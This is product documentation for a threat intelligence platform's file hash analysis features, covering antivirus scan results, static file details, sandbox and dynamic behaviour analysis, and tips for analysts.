File Hash

Overview

The CoreTIS platform offers a comprehensive suite of analysis tools for file hash indicators, categorized under “Detection,” “Details,” and “Behaviour” tabs. Each section furnishes critical data points for cybersecurity experts to analyze potentially malicious files.

Detection Tab for File Hash Indicators

Antivirus Engine Analysis

This module scans the file hash across various antivirus engines to identify potential threats.

• Data Provided:
  • Scan results indicating whether the file is deemed malicious, suspicious, or harmless by each engine.
• Utility:
  • Provides an aggregated view of how different security platforms perceive the threat level of the file.
  • Helps to quickly identify files recognized as threats by multiple antivirus vendors.

Details Tab for File Hash Indicators

File Names

Lists all known names the file has been detected as.

• Utility:
  • Assists in identifying the file across different systems or networks.
  • Helps link different incidents involving the same file.

File Sections

Details the structural components of the file, including headers and allocated memory sections.

• Utility:
  • Offers insight into the file’s composition which can indicate its purpose or nature.
  • Can be used to identify packed or obfuscated files.

Import Table

Shows external libraries and functions that the file calls upon.

• Utility:
  • Identifies dependencies that could be indicative of malicious activity.
  • Helps in creating signatures for detection tools.

File Type Identification

Provides information on the file type, based on both the file extension and header analysis.

• Utility:
  • Ensures accurate classification of the file type for appropriate handling and analysis.
  • Can detect discrepancies indicative of file masquerading.

Sandbox Analysis

Results from executing the file in a controlled environment to observe its behavior.

• Utility:
  • Reveals the file’s actions when executed, such as network communication, file modifications, or persistence mechanisms.
  • Aids in assessing the risk without exposing production environments.

Detection Scenarios

Outlines conditions or environments where the file has been detected or flagged.

• Utility:
  • Provides context for the file’s discovery, helping to understand potential attack vectors.
  • Assists in situational awareness for security teams.

Behaviour Tab for File Hash Indicators

Dynamic Analysis

Offers a dynamic analysis of the file’s behavior, including network, registry, and process activities.

• Data Provided:

  • Network connections initiated by the file.
  • File System Acitvity
  • Mutex Activity
  • Service Activity
  • Registry keys created or modified.
  • Commands executed and processes started.
• Utility:
  • Crucial for understanding the full scope of the file’s impact on a system.
  • Enables analysts to trace the file’s actions to identify malicious intent or side effects.

Best Practices for Analysts

• Use the Antivirus Engine Analysis as a preliminary filter to prioritize investigation efforts.
• Dive into the Details tab for static analysis insights which are crucial for understanding the inner workings of the file.
• Utilize the Behaviour tab for dynamic analysis to get a real-time picture of the file’s operations within a system.